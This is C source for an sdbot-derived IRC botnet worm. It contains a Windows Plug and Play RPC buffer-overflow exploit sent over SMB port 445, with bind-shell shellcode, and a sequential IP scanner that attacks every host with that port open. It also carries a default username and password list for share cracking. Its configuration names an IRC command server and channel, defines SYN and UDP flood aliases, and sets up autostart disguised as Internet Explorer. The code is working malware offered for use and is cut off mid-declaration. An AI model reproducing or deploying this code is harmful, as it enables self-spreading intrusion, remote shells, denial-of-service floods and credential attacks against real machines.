// sdbot 0.6b SYN Flood Edition/pnp Spread by danix moded


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#include <shellapi.h>
#include <mmsystem.h>
#include <lm.h>

#define WIN32_LEAN_AND_MEAN
#pragma comment(lib, "Ws2_32.lib")

//#define DEBUG_MODE

/* usernames to use for cracking */
#include <stdio.h>
#include <string.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")

#define ACCEPT_TIMEOUT 25
#define RECVTIMEOUT 15

unsigned short pnpport=445;


unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x 00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x 45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x 2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x 69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x 72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x 32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x 00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";


unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x 00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x 80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x 82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x 73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x 31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x 6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x 20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";


unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x 00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x 80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x 00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x 00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x 00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x 8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\x D2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x 64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x 30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x 69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x 30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x 00\x00";


unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x 00\x2F\x00\x00";



unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";


/* browser */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x 16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x 40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x 72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x 10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x 00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x 49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x 10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x 3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x 04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x 02\x00\x00\x00";



unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x 00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x 01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x 08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x 49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x 10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x 00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x 52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x 54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x 00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x 90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x 67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x 67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x 67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x 67\x15\x7a\x76"

/* jmp over - entry point */
"\xEB\x08\x90\x90"

/* pop reg; pop reg; retn; - umpnpmgr.dll */
//"\x67\x15\x7a\x76" /* 0x767a1567 */
"\x79\x3C\x01\x01" /* 0x1013C79 */
//"\x79\x3C\x01\x01" //Another Offset to use
/* jmp ebx - umpnpmgr.dll
"\x6f\x36\x7a\x76" */

"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x 4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90";


unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";


unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\x f1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x 61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\x f7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x 22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x 46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x 92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x 57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x 46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x 98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\x cf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x 7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x 4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\x fc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x 60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x 90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\x b3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\x e7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x 48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\x e6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\x f6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
*(unsigned short *)(((buf)+186)) = (port)


void
convert_name(char *out, char *name)
{
unsigned long len;

len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '\x00';
*out-- = name[len];
}
}


#define MAX_USERNAME 12
const CHAR *lpszUserName[MAX_USERNAME] = {
"admin",
"administrator",
"database",
"guest",
"owner",
"root",
"sql",
"sqlagent",
"system",
"user",
"wwwadmin",
NULL
};

/* passwords to use for cracking */
#define MAX_PASSWORD 33
const CHAR *lpszPassword[MAX_PASSWORD] = {
"",
"admin",
"administrator",
"asdf",
"asdfgh",
"database",
"guest",
"hidden",
"owner",
"pass123",
"pass",
"password123",
"password",
"root",
"secret",
"server",
"sql",
"sqlagent",
"system",
"user",
"wwwadmin",
"1",
"!@#$%^&*",
NULL
};

/* minimal ip_addr to use when generating addresses */
#define MIN_IPADDR_A 10
#define MIN_IPADDR_B 0
#define MIN_IPADDR_C 0
#define MIN_IPADDR_D 1
/* maximum ip_addr to use when generating addresses */
#define MAX_IPADDR_A 240
#define MAX_IPADDR_B 240
#define MAX_IPADDR_C 240
#define MAX_IPADDR_D 240


/**================================================ =================================**
**================================================ =================================**
** - DON'T EVEN THINK ABOUT TOUCHING THIS!!!! **
** - ALL CHANGES FROM THIS POINT ON AREN'T SUPPORTED **
** - DO NOT CHANGE THE #include LINES EITHER **
** - IF YOU REMOVE MY COMMENTS, OR DO NOT HEED THEIR WARNINGS, **
** YOU WILL BURN IN HELL **
**================================================ =================================**
**====== ============ ============ ============ ============ =======**
**====== ============ ============ ============ ============ =======**
**====== ============ ============ ============ ============ =======**
**=== ====== ====== ====== ====== ====**
**==== ======== ======== ======== ======== =====**
**===== ========== ========== ========== ========== ======**
**====== ============ ============ ============ ============ =======**
**======= ============== ============== ============== ============== ========**
**================================================ =================================**/

/* link required libraries in VC++ */
#pragma comment(exestr, " aH v1.0 ") /* required for library linking */
#pragma comment(lib, "mpr.lib") /* library for WNetCancelConnection() and WNetAddConnection2() */
#pragma comment(lib, "wsock32.lib") /* Winsock 1.1 library */
#pragma comment(lib, "netapi32.lib") /* required for NetRemoteTOD() and NetScheduleJobAdd() */
#pragma comment(lib, "advapi32.lib") /* required for GetVersionEx() */
#pragma comment(linker, "/subsystem:console")
//PNP SHIT Definitions

#define MAX_THREADS 2

DWORD WINAPI DoExploit(LPVOID);
DWORD WINAPI DoShell(LPVOID);

HANDLE hThreads[MAX_THREADS];

DWORD id[MAX_THREADS];

DWORD waiter;

unsigned short ShellPORT=9661;
//#define MAX_NB_THREAD 16
#define MAX_NB_THREAD 56
#define MAX_IP 16
INT nIPAddrA = 10;
INT nIPAddrB = 0;
INT nIPAddrC = 0;
INT nIPAddrD = 0;
HANDLE hThread[MAX_NB_THREAD];

DWORD WINAPI ScanNetDAMA(LPVOID lpvThread);
VOID GetLocalIP();
VOID GetCmdIP(CHAR *lpIPAddr);
VOID GetNextIP(CHAR szIPAddr[MAX_IP]);
INT EnumShare(CHAR szRemoteAddr[MAX_PATH], CHAR szFoundShare[MAX_PATH]);
BOOL WINAPI TermProcess(DWORD dwCtrlType);
INT dopnp(char *ipx );

char *GetIP(SOCKET sock){
static char IP[16];

SOCKADDR sa;
int sas = sizeof(sa);
memset(&sa, 0, sizeof(sa));
getsockname(sock, &sa, &sas);

sprintf(IP,"%d.%d.%d.%d",(BYTE)sa.sa_data[2], (BYTE)sa.sa_data[3], (BYTE)sa.sa_data[4], (BYTE)sa.sa_data[5]);
return (IP);
}

DWORD WINAPI ScanNetDAMA(LPVOID lpvThread)
{
NETRESOURCE NetResource;
LPTSTR lpszFileName;
CHAR szRemoteName[MAX_PATH];
CHAR szFullPath[MAX_PATH];
CHAR szNewName[MAX_PATH];
CHAR szIPAddr[MAX_IP];
CHAR szRemoteUNC[MAX_PATH];
DWORD dwFlags;
DWORD dwRet;
BOOL bCopy;
INT nK;
INT nL;
INT nN;
SOCKET Socket;
//unsigned int bport=6600;
SOCKADDR_IN SockAddr;
unsigned short nPort;
INT nConnect;
CHAR szRemoteShare[MAX_PATH];

/* infinite loop entry point */
while (1)
{
GetNextIP(szIPAddr);
// bport++;
//fix shell port limit here
/*if ( bport >= 65000 )
{
bport=6600;
}*/
printf("[SCANNING] Address: %s\tPort: 445\n", szIPAddr);
nPort = pnpport;
Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
SockAddr.sin_family = AF_INET;
SockAddr.sin_port = htons(nPort);
SockAddr.sin_addr.s_addr = inet_addr(szIPAddr);
nConnect = connect(Socket, (SOCKADDR *) &SockAddr, sizeof(SockAddr));
if (nConnect != SOCKET_ERROR)
{
#ifdef DEBUG_MODE
printf("[SCANNED] Address: %s\tPort: 445\tState: Open\n", szIPAddr);
#endif
closesocket(Socket);
dopnp(szIPAddr);



}
else
{
/* apparently they didnt have netbios open, try again with diff ip_addr */
#ifdef DEBUG_MODE
printf("[SCANNED] Address: %s\tPort: 445\tState: Closed\n", szIPAddr);
#endif
closesocket(Socket);
}
Sleep(512);
}

return 0;
}

/************************************************** ************************************************** *****************/
VOID GetLocalIP()
{
CHAR szLocalIP[80];
LPHOSTENT lpLocalIPStruct;
IN_ADDR inLocalIPStruct;
CHAR szIPAddr[MAX_IP];
LPTSTR lpszTemp;

lpszTemp = NULL;

/* get the local ip_addr information */
/* Did You Know: 1MB is not 1000KB but instead 1024KB because 2^10 = 1024 */
if (gethostname(szLocalIP, sizeof(szLocalIP)) != SOCKET_ERROR)
{
lpLocalIPStruct = gethostbyname(szLocalIP);
if (lpLocalIPStruct != 0)
{
if (lpLocalIPStruct->h_addr_list[0] != 0)
{
/* cram the ip_addr into the 4 global variables */
memcpy(&inLocalIPStruct, lpLocalIPStruct->h_addr_list[0], sizeof(IN_ADDR));
sprintf(szIPAddr, "%s", inet_ntoa(inLocalIPStruct));
lpszTemp = strtok(szIPAddr, ".");
nIPAddrA = atoi(lpszTemp);
lpszTemp = strtok(NULL, ".");
nIPAddrB = atoi(lpszTemp);
lpszTemp = strtok(NULL, ".");
nIPAddrC = atoi(lpszTemp);
lpszTemp = strtok(NULL, ".");
nIPAddrD = atoi(lpszTemp);
}
}
}
/* if local ip_addr is internal, then start with first LAN machine ip_addr */
if ((nIPAddrA == 192) && (nIPAddrB == 168))
{
nIPAddrA = 192;
nIPAddrB = 168;
nIPAddrC = 0;
nIPAddrD = 1;
}
else if (nIPAddrA == 10)
{
nIPAddrA = 10;
nIPAddrB = 0;
nIPAddrC = 0;
nIPAddrD = 1;
}

}

/************************************************** ************************************************** *****************/
VOID GetCmdIP(CHAR *lpIPAddr)
{
CHAR *lpszReturn;
INT nK = 0;

lpszReturn = strtok(lpIPAddr, ".");
while (lpszReturn != NULL)
{
if (nK == 0)
{
nIPAddrA = atoi(lpszReturn);
}
if (nK == 1)
{
nIPAddrB = atoi(lpszReturn);
}
if (nK == 2)
{
nIPAddrC = atoi(lpszReturn);
}
if (nK == 3)
{
nIPAddrD = atoi(lpszReturn);
}
lpszReturn = strtok(NULL, ".");
nK++;
}
}

/************************************************** ************************************************** *****************/
VOID GetNextIP(CHAR szIPAddr[MAX_IP])
{
CHAR szBuffer[MAX_IP];

/* increment and check, too large? reset to min value */
nIPAddrD++;
if (nIPAddrD > 240)
{
nIPAddrD = 1;
nIPAddrC++;
if (nIPAddrC > 240)
{
nIPAddrC = 0;
nIPAddrB++;
if (nIPAddrB > 240)
{
nIPAddrB = 0;
nIPAddrA++;
if (nIPAddrA > 240)
{
nIPAddrA = 10;
}
}
}
}
/* assign new values to be returned */
itoa(nIPAddrA, szBuffer, 10);
strcpy(szIPAddr, szBuffer);
strcat(szIPAddr, ".");
itoa(nIPAddrB, szBuffer, 10);
strcat(szIPAddr, szBuffer);
strcat(szIPAddr, ".");
itoa(nIPAddrC, szBuffer, 10);
strcat(szIPAddr, szBuffer);
strcat(szIPAddr, ".");
itoa(nIPAddrD, szBuffer, 10);
strcat(szIPAddr, szBuffer);
}

/************************************************** ************************************************** *****************/
VOID GetRandIP(CHAR szIPAddr[MAX_IP])
{
CHAR szIPAddrA[4];
CHAR szIPAddrB[4];
CHAR szIPAddrC[4];
CHAR szIPAddrD[4];

srand(GetTickCount());
itoa(rand() % 230 + 10, szIPAddrA, 10);
itoa(rand() % 240, szIPAddrB, 10);
itoa(rand() % 240, szIPAddrC, 10);
itoa(rand() % 239 + 1, szIPAddrD, 10);
strcpy(szIPAddr, szIPAddrA);
strcat(szIPAddr, ".");
strcat(szIPAddr, szIPAddrB);
strcat(szIPAddr, ".");
strcat(szIPAddr, szIPAddrC);
strcat(szIPAddr, ".");
strcat(szIPAddr, szIPAddrD);
}

/************************************************** ************************************************** *****************/
INT EnumShare(CHAR szRemoteAddr[MAX_PATH], CHAR szFoundShare[MAX_PATH])
{
DWORD dwLevel;
DWORD dwMaxLen;
DWORD dwReadEntries;
DWORD dwTotalEntries;
DWORD hResume;
DWORD dwReturn;
wchar_t wcRemoteAddr[MAX_PATH] = L"";
CHAR szShareName[MAX_PATH];
CHAR szSharePath[MAX_PATH];
LPSHARE_INFO_2 lpShareInfo2;
LPSHARE_INFO_2 lpCurrentInfo;
DWORD dwK = 0;
NETRESOURCE NetResource;
CHAR szRemotePath[MAX_PATH];

mbstowcs(wcRemoteAddr, szRemoteAddr, strlen(szRemoteAddr) + 1);
hResume = 0;
do
{
lpShareInfo2 = NULL;
dwLevel = 2;
dwMaxLen = 8192;
strcpy(szRemotePath, szRemoteAddr);
strcat(szRemotePath, "\\IPC$");
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = szRemotePath;
NetResource.lpProvider = NULL;
dwReturn = WNetAddConnection2(&NetResource, NULL, NULL, 0);
if (dwReturn == NO_ERROR)
{
dwReturn = NetShareEnum((CHAR *) wcRemoteAddr, dwLevel, (LPBYTE *) &lpShareInfo2, dwMaxLen, &dwReadEntries, &dwTotalEntries, &hResume);
if (dwReturn != ERROR_MORE_DATA && dwReturn != ERROR_SUCCESS)
{
break;
}
for (dwK = 0, lpCurrentInfo = lpShareInfo2; dwK < dwReadEntries; ++dwK, ++lpCurrentInfo)
{
sprintf(szShareName, "%S", lpCurrentInfo->shi2_netname);
sprintf(szSharePath, "%S", lpCurrentInfo->shi2_path);
#ifdef DEBUG_MODE
printf("[SHARE] Server: %s\tShare: %s\t Path: %s\n", szRemoteAddr, szShareName, szSharePath);
#endif
if (strcmp(szSharePath, "C:\\") == 0)
{
memset(szFoundShare, '\0', sizeof(szFoundShare));
strcpy(szFoundShare, szShareName);
NetApiBufferFree(lpShareInfo2);
NetApiBufferFree(lpCurrentInfo);
return 1;
}
}
NetApiBufferFree(lpShareInfo2);
NetApiBufferFree(lpCurrentInfo);
}
} while (dwReturn == ERROR_MORE_DATA);
return 0;
}

/************************************************** ************************************************** *****************/
BOOL WINAPI TermProcess(DWORD dwCtrlType)
{
INT nK = 0;
BOOL nbTerm[MAX_NB_THREAD];

if (dwCtrlType == CTRL_C_EVENT)
{
for (nK = 0; nK < MAX_NB_THREAD; nK++)
{
unsigned long exitCode=0;
GetExitCodeThread(hThread[nK], (unsigned long*)exitCode);
nbTerm[nK] = TerminateThread(hThread[nK], exitCode);
}
WSACleanup();
exit(0);
return TRUE;
}
return FALSE;
}

// bot version (used in about/status/version reply)
#define vername "dxdxb0t 0.1"

// #define REMOVE_NONSYNNERS // .remove bots that can't SYN flood once it's been attempted

// #define NO_IDENT // disables ident server
// #define NO_SPY // SPIES AND CLONES ARE USELESS
// #define NO_UDP // disables UDP functions
// #define NO_PING // disables ping functions
// #define NO_NETINFO // disables network info function
// #define NO_SYSINFO // disables system info function
// #define NO_REDIRECT // disables port redirect function
// #define NO_DOWNLOAD // disables downloading/updating functions
// #define NO_VISIT // disables visiting URLs
// #define NO_CONNCHECK // disables check for internet connection

// macro for predefined aliases. (these are just examples, you can change them to whatever you want)
#define addpredefinedaliases() \
addalias("opme", "mode $chan +o $user"); \
addalias("smack", "action $chan smacks $1"); \
addalias("u1", "udp $1 10000 2048 50"); \
addalias("p2", "ping $1 10000 $2 50"); \
addalias("s1", "syn $1 80 60"); \
addalias("ctcp", "raw PRIVMSG $1 :$chr(1)$2-$chr(1)");

// bot configuration
const char botid[] = "di0ax0.3"; // bot id
const char password[] = "diogoaxonly"; // bot password
const int maxlogins = 1; // maximum number of simultaneous logins
const int maxrand = 0; //Number of max random chars to put on end of bot nick
const char server[] = "akers.irc.org"; // server
const int port = 6667; // server port
const char serverpass[] = ""; // server password
const char channel[] = "#pnpdummyz"; // channel that the bot should join
const char chanpass[] = "YoYo"; // channel password
const char server2[] = "akersbackup.irc.org"; // backup server (optional)
const int port2 = 6667; // backup server port
const char channel2[] = "#pnpdummyz"; // backup channel (optional)
const char chanpass2[] = "dx12212"; // backup channel password (optional)
const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands
const BOOL rndfilename = FALSE; // use random file name
const char filename[] = "iexplore.exe"; // destination file name
const BOOL AutoStart = TRUE;
const char valuename[] = "Configuration Internet Explorer"; // value name for autostart
const char prefix = '.'; // command prefix (one character max.)
const char version[] = "sdbdx.0.1"; // bot's VERSION reply
const int cryptkey = 0; // encryption key (not used right now)
const int maxaliases = 16; // maximum number of aliases (must be greater than the number of predefined aliases).
const char *versionlist[] = {
"BitchX-74p2+ by panasync - CYGWIN32/95 4.0 : Keep it to yourself!",
"..(argon/1g) :bitchx-75 : Keep it to yourself!",
"BitchX-70alpha14+tcl by panasync - Linux 2.0.27 Keep it to yourself!",
"BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock/bX [3.0.1á8] : Keep it to yourself!",
"[bx.75p1] linux 2.0.36 [embryonic.22b3] :what is this that stands before me",
"ircII EPIC4pre2 Linux 2.0.34 - Accept no limitations.",
"ircII EPIC4pre2 SunOS 5.6 - cypher(beta\\one) -myd!nas :one step closer to world domination",
"ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%summer '96(bitX%summer'96)",
"ircII 2.8.2 SunOS 5.6 :ircii 2.8: almost there...",
"ircII 2.9_base OSF1 V4.0 :ircii 2.8: almost there...",
"mIRC32 v3.9 K.Mardam-Bey",
"mIRC32 v4.11 K.Mardam-Bey",
"mIRC32 v5.41 K.Mardam-Bey",
"mIRC32 v5.5 K.Mardam-Bey",
"mIRC32 v5.71 K.Mardam-Bey",
"mIRC32 v5.82 K.Mardam-Bey",
"WSIRC 2.03-R - CopyRight 1994, 1995 Caesar M Samsi csamsi@clark.net TEXT CHANNEL",
"ircN 6.03 for mIRC - are we being punished for fate -",
"ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mIRC - the devils of truth steal the souls of the free -",
"osiris-1c/bitchx-75p1 + autobot(bx) p3x3 : that time then and once again..",
"xircon[b4] + doot.3b[pawt] be-two + anony(v1) + aolsay(impulse) + deepthought + saq(dbg)",
"AmIRC/AmigaOS 2.0.4 by Oliver Wagner <owagner@vapor.com> : http://www.vapor.com/ : [#0000D63F] : The slow mess client",
"Quarterdeck Global Chat 1.2.9 for Macintosh",
"Ircle 3.0b10 US PPC 12/15/1997 21:07:34 PM. #239C23AF21B",
"Eggdrop 1.3.24i (c)1997 Robey Pointer",
"JPilot IRC Java Client 2.32",
"WinIRC CE (beta version code046532) - palmtop PC's IRC addon (Windows CE) - Microsoft Corporation'1999",
"PalmIRC Ver1.1 (Unregistered) by H.Okamoto",
"Netscape Communicator 5.0 (WWW IRC - Now we're talking!)",
"Nokia Communicator IRC (mobile phone [WAP9210]) - v3.523 serial 543.32 - Nokia, Connecting People",
"IEirc (winME[ie.v.4572]) - Copyright Microsoft Corporation 2000, all rights reserved",
"IRC-Playstation client version 0.1.2313e - Copyright Sony 2000",
"SegaIRC v1.0.3release / MegaDrive16 version (340575) / (Copyright Sega'99 - all rights reserved)",
"GameIRC v1.2beta: for GameBoy (Copyright Nintendo'99)",
"Powered by NVIDIA®'s new GeForce2 GTS Script (3DBlaster AnnihilatorT 2) - the world's first accelerator script",
};

// ping/udp structure.
typedef struct ps {
char host[128];
char chan[128];
int num;
int size;
int delay;
int port;
SOCKET sock;
int threadnum;
BOOL silent;
BOOL gotinfo;
} ps;

// irc/spy structure.
typedef struct ircs {
char host[128];
int port;
char channel[64];
char chanpass[64];
char hchan[64];
char nick[16];
SOCKET sock;
int spy;
int threadnum;
BOOL gotinfo;
} ircs;

#ifndef NO_REDIRECT
// redirect structure.
typedef struct rs {
char dest[128];
int port;
int lport;
SOCKET sock;
SOCKET csock;
int threadnum;
BOOL silent;
BOOL gotinfo;
} rs;
#endif

#ifndef NO_DOWNLOAD
// download/update structure
typedef struct ds {
char url[256];
char dest[256];
char chan[128];
SOCKET sock;
int run;
int threadnum;
int update;
BOOL silent;
BOOL gotinfo;
} ds;
#endif

#ifndef NO_VISIT
// visit structure
typedef struct vs {
char host[128];
char referer[128];
char chan[128];
SOCKET sock;
BOOL silent;
BOOL gotinfo;
} vs;
#endif

// alias structure
typedef struct as {
char name[24];
char command[160];
} as;

#ifndef NO_PING
// icmp.dll typedefs/structs
typedef unsigned long IPAddr;
typedef struct ip_option_information {
unsigned char Ttl;
unsigned char Tos;
unsigned char Flags;
unsigned char OptionsSize;
unsigned char FAR *OptionsData;
} IP_OPTION_INFORMATION, *PIP_OPTION_INFORMATION;
typedef struct icmp_echo_reply {
IPAddr Address;
unsigned long Status;
unsigned long RoundTripTime;
unsigned short DataSize;
unsigned short Reserved;
void FAR *Data;
struct ip_option_information Options;
} ICMP_ECHO_REPLY;

// kernel32.dll typedefs/structs
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
DWORD *th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
CHAR szExeFile[MAX_PATH];
